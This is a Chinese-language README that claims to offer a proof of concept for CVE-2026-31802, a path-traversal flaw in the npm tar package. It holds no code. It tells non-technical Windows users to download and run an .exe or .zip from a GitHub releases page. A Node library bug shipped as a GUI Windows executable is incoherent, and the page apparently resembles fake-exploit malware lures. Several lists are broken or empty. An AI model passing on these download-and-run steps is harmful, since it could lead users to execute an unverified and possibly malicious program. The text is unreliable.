本仓库提供了 CVE-2026-31802 的概念验证 (PoC) 及分析报告。该问题存在于 npm tar 包中,是一个安全漏洞。攻击者可通过滥用符号链接和路径遍历,欺骗软件将文件写入其允许文件夹之外的位置。
这可能导致未经授权覆盖您计算机上的重要文件。了解并测试此漏洞有助于提升安全性。本项目展示了该漏洞的工作原理,并帮助安全研究人员验证修复方案。
要在 Windows 机器上运行本软件,请确保系统满足以下条件:
无需编程或开发者工具。只要能使用浏览器并运行简单程序,任何人都可按照以下步骤操作。
下载并非单个文件,而是一个发布页面。请仔细遵循以下步骤:
访问发布页面
点击上方的徽章,或直接访问以下链接: https://github.com/Recorded-texteditor120/CVE-2026-31802/releases
找到最新版本
在发布页面中,查找最新版本。它通常显示在列表顶部,并包含日期信息。
下载正确的文件
点击适合 Windows 系统的文件,通常具有 .exe 或 .zip 扩展名。如果不确定,请选择 .exe 以便更轻松地安装。
保存文件
将文件保存到已知文件夹,例如“下载”或“桌面”。
如果您下载的是 .exe 文件:
.exe 文件所在位置。如果您下载的是 .zip 文件:
.zip 文件,选择“全部提取”。.exe)以启动。本应用程序作为演示工具,展示漏洞的运行方式。
界面将通过简单的按钮和文本框引导您操作。无需编程技能,请仔细遵循屏幕提示。
本软件复制了 npm tar 模块中的安全缺陷。
这种行为凸显了该漏洞的严重性以及修复的必要性。
请定期检查发布页面以获取更新: https://github.com/Recorded-texteditor120/CVE-2026-31802/releases
按照首次下载的方式下载并安装新版本。更新可能包含错误修复、安全补丁或可用性改进。
本软件仅用于教育和测试目的。其目标是帮助提升安全认识,并针对 npm tar 的这一弱点提供修复方案。
仓库中包含有关该漏洞、利用方法以及测试过程的详细文档。欢迎阅读随附文件以加深理解。
本项目涉及:
这些术语与漏洞的性质及所涉及的领域相关。